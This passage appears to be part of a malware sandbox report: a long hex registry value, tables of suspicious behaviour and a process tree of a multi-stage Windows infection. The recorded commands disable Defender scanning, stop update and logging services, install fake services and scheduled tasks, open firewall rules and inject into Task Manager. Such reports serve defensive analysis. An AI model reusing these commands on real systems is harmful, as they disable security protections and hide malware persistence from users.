d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\mmc.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\cwvffbi | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\mmc.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | N/A |
| N/A | N/A | C:\Windows\system32\mmc.exe | N/A |
| N/A | N/A | C:\Windows\system32\mmc.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4120 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe
"C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"
C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe
"C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"
C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe
"C:\Users\Admin\Pictures\vn0dZ1KknFaoEqIsGOGNDVH5.exe"
C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe
"C:\Users\Admin\Pictures\6VC6yCs5XvpI0RU46xUTlGFH.exe"
C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3Q3V6.tmp\jVcQfTbmL2u1ousPu7tmRClP.tmp" /SL5="$203F8,1697450,56832,C:\Users\Admin\Pictures\jVcQfTbmL2u1ousPu7tmRClP.exe"
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
"C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --silent --allusers=0
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6e7f21c8,0x6e7f21d4,0x6e7f21e0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3908 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:3
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --version
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
"C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5344 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240310162828" --session-guid=212f66a5-7f1b-448e-b906-6cdefc4c9881 --server-tracking-blob=MjUwNDNlOGVhNjM1NmY4OTkyNzdjZTEwNGEwODhmZGRjODEwMDM2ODY5YjI5ZmU1OGFkZTRiZjVhNTE5MTI0NDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDA4ODA5MC44NTUyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIyNWVhMmQwNS1kODE4LTRkZmEtYmQ0MC0yZjVlNjkyYmI4ZGYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=A405000000000000
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe
C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x308,0x30c,0x310,0x2d8,0x314,0x6dce21c8,0x6dce21d4,0x6dce21e0
C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe
"C:\Users\Admin\Pictures\eNjkg8FaEHV29ts9FvoPTUAW.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe
"C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\85CB.bat" "
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x288,0x28c,0x290,0x260,0x294,0x1000040,0x100004c,0x1000058
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\DD14.exe
C:\Users\Admin\AppData\Local\Temp\DD14.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5388 -ip 5388
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 3320
C:\Users\Admin\AppData\Local\Temp\DD14.exe
C:\Users\Admin\AppData\Local\Temp\DD14.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\0e5d7f2d-6754-4be0-b473-73a35806b01c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\DD14.exe
"C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\8F7.exe
C:\Users\Admin\AppData\Local\Temp\8F7.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\DD14.exe
"C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5392 -ip 5392
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 572
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Roaming\cwvffbi
C:\Users\Admin\AppData\Roaming\cwvffbi
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\B159.exe
C:\Users\Admin\AppData\Local\Temp\B159.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B64C.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\EE16.exe
C:\Users\Admin\AppData\Local\Temp\EE16.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe
"C:\Users\Admin\Pictures\zauJwzNDKtlWh0Su7sA66DV7.exe"
